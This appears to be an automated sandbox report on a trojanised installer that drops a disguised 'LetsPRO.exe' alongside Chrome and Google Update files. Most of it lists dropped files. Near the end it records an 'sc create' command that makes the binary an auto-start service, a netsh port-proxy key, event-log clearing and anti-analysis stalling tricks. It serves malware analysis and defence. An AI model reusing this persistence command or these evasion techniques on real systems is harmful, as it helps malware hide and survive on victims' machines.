                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB404.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5FB.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile created: C:\Users\user\99944\LetsPRO.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\adapt_for_imports.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\Lua51.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\WeGame.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ChromeSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB404.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5FB.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB59C.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB54D.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Code function: 30_2_6CC9575C GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,30_2_6CC9575C
                  Source: C:\Windows\System32\netsh.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Code function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,30_2_6CCAA005
                  Source: unknown | Process created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_03F3B3C0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94A2E7 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_6C94A2E7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Key value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059
                  Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Process information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Process information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_4-11474)
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Stalling execution: Execution stalls by calling Sleep (graph_4-11259)
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Special instruction interceptor: First address: 10D98209 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Window / User API: threadDelayed 656
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Window / User API: threadDelayed 460
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Window / User API: threadDelayed 2633
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Window / User API: threadDelayed 3264
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | Window / User API: threadDelayed 1615
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe | Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll
